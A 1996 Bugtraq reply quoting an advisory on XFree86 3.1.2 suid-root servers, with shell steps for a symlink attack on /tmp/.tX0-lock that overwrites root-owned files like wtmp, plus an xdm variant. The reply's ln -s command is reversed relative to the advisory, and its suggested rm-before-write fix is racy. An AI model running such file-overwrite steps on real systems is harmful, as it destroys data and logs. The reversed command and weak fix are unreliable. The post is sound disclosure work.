Re: XFree86 3.1.2 Security Problems

[frantic () worldnet net (Anthony C. Zboralski)]

-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 29 Jan 1996, David J Meltzer wrote:

> Date: Mon, 29 Jan 1996 00:16:46 -0500
> From: David J Meltzer <davem+ () andrew cmu edu>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ () CRIMELAB COM>
> Subject: XFree86 3.1.2 Security Problems
>
>    There are security holes in XFree86 3.1.2, which installs its servers
> as suid root (/usr/X11R6/bin/XF86_*).  When reading and writing files,
> it does not take proper precautions to ensure that file permissions are
> maintained, resulting in the ability to overwrite files, and to read
> limited portions of other files.
>    The first problem stems from the server opening a temporary file,
> /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC).  By making this
> file a symlink, the server will overwrite the original file, and then
> write to it its current pid.
>    Other problems exist in the server relating to similar problems, one
> such example is the ability to specify an arbitrary file for the XF86config
> file which will then be opened, and the first line that fails to match
> the expected format will be output with an error, allowing a line to be
> read from an arbitrary file.
>
>                    Program: XFree86 3.1.2 servers
> Affected Operating Systems: All systems with XFree86 3.1.2 installed
>               Requirements: account on system
>            Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
>        Security Compromise: overwrite arbitrary files
>                     Author: Dave M. (davem () cmu edu)
>                   Synopsis: While running suid root, XFree86 servers do
>                             not properly check file permissions, allowing
>                             a user to overwrite arbitrary files on a
>                             system.
>
>
> Exploit:
> $ ls -l /var/adm/wtmp
> -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
> $ ln -s /var/adm/wtmp /tmp/.tX0-lock
> $ startx
> (At this point exit X if it started, or else ignore any error messages)
> $ ls -l /var/adm/wtmp
> -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp

Oh well if xdm is running.. The temporary patch won't do you good...
Xdm manages a collection of X displays, which may be on the local host
or remote servers. Xdm provides services similar to those provided by
init, getty and login  on character  terminals: prompting for login
name and password, authenticating the user, and running a ``session.''

Xdm is launched by root.. by default it will start a server on the local
display. If the server crashes for some reason, gets killed or if the user
sends a server abort sequence, it will restart the server..

$ps -ax |grep xdm
   80  ?  S     0:00 xdm
  142  ?  S     0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080
  179 v03 D     0:00 grep xdm
$ls -l /var/log/wtmp
- -rw-r--r--   1 root     root        31864 Jan 30 02:13 /var/log/wtmp
$ ln -s /tmp/.tX0-lock /var/log/wtmp

Now, you switch to the local X display and
send the <Crtl><Alt><BS> server abort sequence..
Wait until xdm pops up a new server process..
than switch back to shell:

$ls -l /var/log/wtmp
- -rw-r--r--   1 root     root           11 Jan 30 02:13 /var/log/wtmp

Xdm doesn't need to kill the server when a user logs out so the only worry
would be the sending of the abort sequence easily fixed by uncommenting in
the "Don'tZap" setting in /etc/XF86Config.. but I have seen XF86 crashing
so many times for unguessable reason so i don't think it will fix the prob.

Maybe someone could take a look at the server sources so it does a
system("/bin/rm /tmp/.tX0-lock") just before it a write to the file..
I don't have 'em handy..
____
\  /__  Anthony C. Zboralski <frantic () worldnet net>
 \/  /
   \/   Finger <frantic () webbar imaginet fr> for PGP Public Key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: France, Russia and Irak still forbid encryption..

iQCVAwUBMQ141V/59mQ4I551AQGVEgP/aO3+dCX8FA/2sNOeaE6p33u2+Ed1yuPM
2NyI14L3q1RQ7xt8seHQD1KzWxvRJxbSvWKhrIdhSuisAzlh8QJdn4hZ8ulgPNBf
uesUvAbvVJjhhandT0wjVbL0rYRBJEs9NJtWTrrF/gZ+5+cuvnKM2iyeTcAY9EGL
2MvbAtN6yr4=
=EwzG
-----END PGP SIGNATURE-----